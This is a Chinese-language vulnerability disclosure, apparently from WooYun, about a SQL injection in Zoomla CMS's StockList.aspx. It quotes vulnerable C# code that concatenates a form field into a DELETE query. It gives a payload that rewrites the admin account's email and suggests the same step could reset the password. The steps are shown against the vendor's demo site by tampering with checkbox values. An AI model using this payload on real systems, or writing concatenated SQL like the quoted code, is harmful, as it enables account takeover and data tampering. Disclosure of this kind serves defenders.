### 简要描述:
话说 上次提交直接给忽略 那只好拿官方Demo做测试 另外此洞在2008年就已经存在
### 详细说明:
此问题为UPdate类型
文件
/user/usershop/StockList.aspx 问题参数 Item
问题代码如下
```
protected void Button3_Click(object sender, EventArgs e)
{
string text = base.Request.Form["Item"];
if (!string.IsNullOrEmpty(text) && this.bll.delstock(text))------------------此处
{
base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>");
return;
}
base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>");
}
public bool delstock(string str)
{
string strSql = "delete from ZL_UserStock where (id in (" + str + "))";
return SqlHelper.ExecuteSql(strSql, null);
}
```
构造参数
```
0))update ZL_User set Email='wooyun' where username='admin'-- //修改用户email YY此处可以更改为修改管理员密码
```
过程 登陆后访问
http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111
firebug修改页面<table>内容
图:
[<img src="https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png)
内容如下:
```
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border">
<tbody><tr align="center" style="background:#FFBD59">
<td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td>
<td width="13%" class="title">单据类型</td>
<td width="20%" class="title">单据编号</td>
<td width="15%" class="title">
录入时间</td>
<td width="12%" class="title"> 录入者</td>
<td width="20%" class="title"> 备注</td>
<td width="15%" class="title"> 操作</td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="3" name="Item"></td>
<td height="22" align="center">出库</td>
<td height="22" align="center">订单</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">好家伙</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=3">删除</a></td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="2" name="Item"></td>
<td height="22" align="center">出库</td>
<td height="22" align="center">订单</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">好家伙</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=2">删除</a></td>
</tr>
<tr class="tdbg">
<td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录 <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">首页</a></span> <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">上一页</a></span> <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">下一页</a></span> <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">尾页</a></span> 页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页 转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1">
<option value="1">1</option>
</select>页</td>
</tr>
</tbody></table>
```
修改复选框中的value
[<img src="https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png" alt="Value.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png)
然后点击删除按钮即可
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png)
本地下载的 CMS2 V1.3 V1.4 V1.5、 CMS6.0均受影响
另外 从最早的一个文件来看此洞在2008年就已经存在
暂无评论